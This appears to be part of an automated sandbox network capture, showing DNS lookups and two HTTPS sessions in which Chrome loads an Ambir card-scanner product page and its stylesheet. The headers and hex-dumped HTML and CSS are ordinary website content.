                                                                                                                                                                                              Nov 20, 2024 21:28:56.099944115 CET1.1.1.1192.168.2.50xd4b2No error (0)ib.anycast.adnxs.com37.252.171.53A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:56.099944115 CET1.1.1.1192.168.2.50xd4b2No error (0)ib.anycast.adnxs.com37.252.171.85A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:56.099944115 CET1.1.1.1192.168.2.50xd4b2No error (0)ib.anycast.adnxs.com37.252.171.52A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:56.099944115 CET1.1.1.1192.168.2.50xd4b2No error (0)ib.anycast.adnxs.com37.252.172.123A (IP address)IN (0x0001)false
                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              0192.168.2.549710141.193.213.104431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:12 UTC672OUTGET /ambir-card-scanners/ HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                                                                              Sec-Fetch-User: ?1
                                                                                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:13 UTC582INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:13 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding,Cookie
                                                                                                                                                                                              WPO-Cache-Status: cached
                                                                                                                                                                                              Last-Modified: Wed, 20 Nov 2024 18:27:19 GMT
                                                                                                                                                                                              X-Powered-By: WP Engine
                                                                                                                                                                                              X-Cacheable: SHORT
                                                                                                                                                                                              Cache-Control: max-age=600, must-revalidate
                                                                                                                                                                                              X-Cache: HIT: 7
                                                                                                                                                                                              X-Cache-Group: normal
                                                                                                                                                                                              X-Orig-Cache-Control: no-cache
                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2f64ee795e7c-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:13 UTC787INData Raw: 37 64 36 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69
                                                                                                                                                                                              Data Ascii: 7d6a<!doctype html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /> <link rel="preconnect" href="https://fonts.googleapis.com"><link rel="preconnect" href="https://fonts.gstati
                                                                                                                                                                                              2024-11-20 20:28:13 UTC1369INData Raw: 20 67 74 6d 34 77 70 5f 63 75 72 72 65 6e 63 79 20 3d 20 27 55 53 44 27 3b 0a 09 63 6f 6e 73 74 20 67 74 6d 34 77 70 5f 70 72 6f 64 75 63 74 5f 70 65 72 5f 69 6d 70 72 65 73 73 69 6f 6e 20 3d 20 66 61 6c 73 65 3b 0a 09 63 6f 6e 73 74 20 67 74 6d 34 77 70 5f 63 6c 65 61 72 5f 65 63 6f 6d 6d 65 72 63 65 20 3d 20 66 61 6c 73 65 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 20 45 6e 64 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 66 6f 72 20 57 6f 72 64 50 72 65 73 73 20 62 79 20 67 74 6d 34 77 70 2e 63 6f 6d 20 2d 2d 3e 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 50 72 65 6d 69 75 6d 20 70 6c 75 67 69 6e 20 76 32 33 2e 34 20 28 59 6f 61 73
                                                                                                                                                                                              Data Ascii: gtm4wp_currency = 'USD';const gtm4wp_product_per_impression = false;const gtm4wp_clear_ecommerce = false;</script>... End Google Tag Manager for WordPress by gtm4wp.com -->... This site is optimized with the Yoast SEO Premium plugin v23.4 (Yoas
                                                                                                                                                                                              2024-11-20 20:28:13 UTC1369INData Raw: 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6d 61 67 65 2f 6a 70 65 67 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 63 61 72 64 22 20 63 6f 6e 74 65 6e 74 3d 22 73 75 6d 6d 61 72 79 5f 6c 61 72 67 65 5f 69 6d 61 67 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 6c 61 62 65 6c 31 22 20 63 6f 6e 74 65 6e 74 3d 22 45 73 74 2e 20 72 65 61 64 69 6e 67 20 74 69 6d 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 64 61 74 61 31 22 20 63 6f 6e 74 65 6e 74 3d 22 36 20 6d 69 6e 75 74 65 73 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f
                                                                                                                                                                                              Data Ascii: /><meta property="og:image:type" content="image/jpeg" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:label1" content="Est. reading time" /><meta name="twitter:data1" content="6 minutes" /><script type="applicatio
                                                                                                                                                                                              2024-11-20 20:28:13 UTC1369INData Raw: 63 61 72 64 2d 64 6f 63 75 6d 65 6e 74 2d 73 63 61 6e 6e 65 72 73 5f 32 32 35 68 2e 6a 70 67 22 2c 22 63 6f 6e 74 65 6e 74 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6d 62 69 72 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 31 30 2f 63 61 72 64 2d 64 6f 63 75 6d 65 6e 74 2d 73 63 61 6e 6e 65 72 73 5f 32 32 35 68 2e 6a 70 67 22 2c 22 77 69 64 74 68 22 3a 34 34 33 2c 22 68 65 69 67 68 74 22 3a 32 32 35 2c 22 63 61 70 74 69 6f 6e 22 3a 22 41 4d 42 49 52 20 43 61 72 64 20 53 63 61 6e 6e 65 72 73 22 7d 2c 7b 22 40 74 79 70 65 22 3a 22 42 72 65 61 64 63 72 75 6d 62 4c 69 73 74 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6d 62 69 72 2e 63 6f 6d 2f 61 6d 62 69 72 2d 63 61 72 64 2d 73 63 61 6e 6e 65 72 73 2f 23
                                                                                                                                                                                              Data Ascii: card-document-scanners_225h.jpg","contentUrl":"https://ambir.com/wp-content/uploads/2023/10/card-document-scanners_225h.jpg","width":443,"height":225,"caption":"AMBIR Card Scanners"},{"@type":"BreadcrumbList","@id":"https://ambir.com/ambir-card-scanners/#
                                                                                                                                                                                              2024-11-20 20:28:13 UTC1369INData Raw: 7d 7d 5d 7d 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 21 2d 2d 20 2f 20 59 6f 61 73 74 20 53 45 4f 20 50 72 65 6d 69 75 6d 20 70 6c 75 67 69 6e 2e 20 2d 2d 3e 0a 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 70 6c 61 74 66 6f 72 6d 2d 61 70 69 2e 73 68 61 72 65 74 68 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 63 6c 61 73 73 69 63 2d 74 68 65 6d 65 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61
                                                                                                                                                                                              Data Ascii: }}]}</script>... / Yoast SEO Premium plugin. --><link rel='dns-prefetch' href='//platform-api.sharethis.com' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><style id='classic-theme-styles-inline-css' type='text/css'>/*! This file is a
                                                                                                                                                                                              2024-11-20 20:28:13 UTC1369INData Raw: 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 23 39 62 35 31 65 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 36 2c 31 34 37 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 31 32 32 2c 32 32 30 2c 31 38 30 29 20 30 25 2c 72 67 62 28
                                                                                                                                                                                              Data Ascii: -vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(
                                                                                                                                                                                              2024-11-20 20:28:13 UTC1369INData Raw: 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6d 69 64 6e 69 67 68 74 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 2c 33 2c 31 32 39 29 20 30 25 2c 72 67 62 28 34 30 2c 31 31 36 2c 32 35 32 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 73 6d 61 6c 6c 3a 20 31 33 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f
                                                                                                                                                                                              Data Ascii: s: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--fo
                                                                                                                                                                                              2024-11-20 20:28:13 UTC1369INData Raw: 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d 70 6c 61 74 65 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 31 2e 32 35 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d 70 6c 61 74 65 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 31 2e 32 35 65 6d 3b 7d 2e 68 61 73 2d 62 6c 61 63 6b 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e
                                                                                                                                                                                              Data Ascii: m;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan
                                                                                                                                                                                              2024-11-20 20:28:13 UTC1369INData Raw: 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e
                                                                                                                                                                                              Data Ascii: ground-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.
                                                                                                                                                                                              2024-11-20 20:28:13 UTC1369INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d
                                                                                                                                                                                              Data Ascii: -color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              1192.168.2.549709141.193.213.104431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:13 UTC617OUTGET /wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-header-c51b1940.min.css HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                              Referer: https://ambir.com/ambir-card-scanners/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:13 UTC476INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:13 GMT
                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Last-Modified: Wed, 20 Nov 2024 18:27:06 GMT
                                                                                                                                                                                              ETag: W/"673e29fa-4e53"
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 6834
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2f691b77c434-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:13 UTC893INData Raw: 34 65 35 33 0d 0a 2e 77 70 63 66 37 20 2e 73 63 72 65 65 6e 2d 72 65 61 64 65 72 2d 72 65 73 70 6f 6e 73 65 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 63 6c 69 70 3a 72 65 63 74 28 31 70 78 2c 31 70 78 2c 31 70 78 2c 31 70 78 29 3b 63 6c 69 70 2d 70 61 74 68 3a 69 6e 73 65 74 28 35 30 25 29 3b 68 65 69 67 68 74 3a 31 70 78 3b 77 69 64 74 68 3a 31 70 78 3b 6d 61 72 67 69 6e 3a 2d 31 70 78 3b 70 61 64 64 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 77 6f 72 64 2d 77 72 61 70 3a 6e 6f 72 6d 61 6c 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 77 70 63 66 37 20 66 6f 72 6d 20 2e 77 70 63 66 37 2d 72 65 73 70 6f 6e 73 65 2d 6f 75 74 70 75 74 7b 6d 61 72 67 69 6e 3a 32 65 6d 20 2e 35 65 6d 20 31 65 6d 3b 70 61
                                                                                                                                                                                              Data Ascii: 4e53.wpcf7 .screen-reader-response{position:absolute;overflow:hidden;clip:rect(1px,1px,1px,1px);clip-path:inset(50%);height:1px;width:1px;margin:-1px;padding:0;border:0;word-wrap:normal!important}.wpcf7 form .wpcf7-response-output{margin:2em .5em 1em;pa
                                                                                                                                                                                              2024-11-20 20:28:13 UTC1369INData Raw: 63 6f 6c 6f 72 3a 23 64 63 33 32 33 32 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 75 73 65 2d 66 6c 6f 61 74 69 6e 67 2d 76 61 6c 69 64 61 74 69 6f 6e 2d 74 69 70 20 2e 77 70 63 66 37 2d 6e 6f 74 2d 76 61 6c 69 64 2d 74 69 70 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 6f 70 3a 2d 32 65 78 3b 6c 65 66 74 3a 31 65 6d 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 63 33 32 33 32 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 70 61 64 64 69 6e 67 3a 2e 32 65 6d 20 2e 38 65 6d 3b 77 69 64 74 68 3a 32 34 65 6d 7d 2e 77 70 63 66 37 2d 6c 69 73 74 2d 69 74 65 6d 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69
                                                                                                                                                                                              Data Ascii: color:#dc3232;font-size:1em;font-weight:400;display:block}.use-floating-validation-tip .wpcf7-not-valid-tip{position:relative;top:-2ex;left:1em;z-index:100;border:1px solid #dc3232;background:#fff;padding:.2em .8em;width:24em}.wpcf7-list-item{display:inli
                                                                                                                                                                                              2024-11-20 20:28:13 UTC1369INData Raw: 6f 6e 3a 6c 74 72 7d 2e 77 70 63 66 37 2d 72 65 66 6c 65 63 74 69 6f 6e 3e 6f 75 74 70 75 74 7b 64 69 73 70 6c 61 79 3a 6c 69 73 74 2d 69 74 65 6d 3b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 2e 77 70 63 66 37 2d 72 65 66 6c 65 63 74 69 6f 6e 3e 6f 75 74 70 75 74 5b 68 69 64 64 65 6e 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 3a 72 6f 6f 74 7b 2d 2d 77 6f 6f 63 6f 6d 6d 65 72 63 65 3a 23 37 46 35 34 42 33 3b 2d 2d 77 63 2d 67 72 65 65 6e 3a 23 37 61 64 30 33 61 3b 2d 2d 77 63 2d 72 65 64 3a 23 61 30 30 3b 2d 2d 77 63 2d 6f 72 61 6e 67 65 3a 23 66 66 62 61 30 30 3b 2d 2d 77 63 2d 62 6c 75 65 3a 23 32 65 61 32 63 63 3b 2d 2d 77 63 2d 70 72 69 6d 61 72 79 3a 23 37 46 35 34 42 33 3b 2d 2d 77 63 2d 70 72 69 6d 61 72 79 2d 74 65 78 74 3a 77 68 69 74 65
                                                                                                                                                                                              Data Ascii: on:ltr}.wpcf7-reflection>output{display:list-item;list-style:none}.wpcf7-reflection>output[hidden]{display:none}:root{--woocommerce:#7F54B3;--wc-green:#7ad03a;--wc-red:#a00;--wc-orange:#ffba00;--wc-blue:#2ea2cc;--wc-primary:#7F54B3;--wc-primary-text:white
                                                                                                                                                                                              2024-11-20 20:28:13 UTC1369INData Raw: 67 65 73 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 77 69 64 74 68 3a 34 38 25 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 23 63 6f 6e 74 65 6e 74 20 64 69 76 2e 70 72 6f 64 75 63 74 20 64 69 76 2e 74 68 75 6d 62 6e 61 69 6c 73 3a 3a 61 66 74 65 72 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 23 63 6f 6e 74 65 6e 74 20 64 69 76 2e 70 72 6f 64 75 63 74 20 64 69 76 2e 74 68 75 6d 62 6e 61 69 6c 73 3a 3a 62 65 66 6f 72 65 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 64 69 76 2e 70 72 6f 64 75 63 74 20 64 69 76 2e 74 68 75 6d 62 6e 61 69 6c 73 3a 3a 61 66 74 65 72 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 64 69 76 2e 70 72 6f 64 75 63 74 20 64 69 76 2e 74 68 75 6d 62 6e 61 69 6c 73 3a 3a 62 65 66 6f 72 65 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 20 23 63 6f 6e
                                                                                                                                                                                              Data Ascii: ges{float:left;width:48%}.woocommerce #content div.product div.thumbnails::after,.woocommerce #content div.product div.thumbnails::before,.woocommerce div.product div.thumbnails::after,.woocommerce div.product div.thumbnails::before,.woocommerce-page #con
                                                                                                                                                                                              2024-11-20 20:28:13 UTC1369INData Raw: 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 20 64 69 76 2e 70 72 6f 64 75 63 74 20 64 69 76 2e 74 68 75 6d 62 6e 61 69 6c 73 20 61 2e 66 69 72 73 74 7b 63 6c 65 61 72 3a 62 6f 74 68 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 23 63 6f 6e 74 65 6e 74 20 64 69 76 2e 70 72 6f 64 75 63 74 20 64 69 76 2e 74 68 75 6d 62 6e 61 69 6c 73 2e 63 6f 6c 75 6d 6e 73 2d 31 20 61 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 64 69 76 2e 70 72 6f 64 75 63 74 20 64 69 76 2e 74 68 75 6d 62 6e 61 69 6c 73 2e 63 6f 6c 75 6d 6e 73 2d 31 20 61 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 20 23 63 6f 6e 74 65 6e 74 20 64 69 76 2e 70 72 6f 64 75 63 74 20 64 69 76 2e 74 68 75 6d 62 6e 61 69 6c 73 2e 63 6f 6c 75 6d 6e 73 2d 31 20 61 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d
                                                                                                                                                                                              Data Ascii: woocommerce-page div.product div.thumbnails a.first{clear:both}.woocommerce #content div.product div.thumbnails.columns-1 a,.woocommerce div.product div.thumbnails.columns-1 a,.woocommerce-page #content div.product div.thumbnails.columns-1 a,.woocommerce-
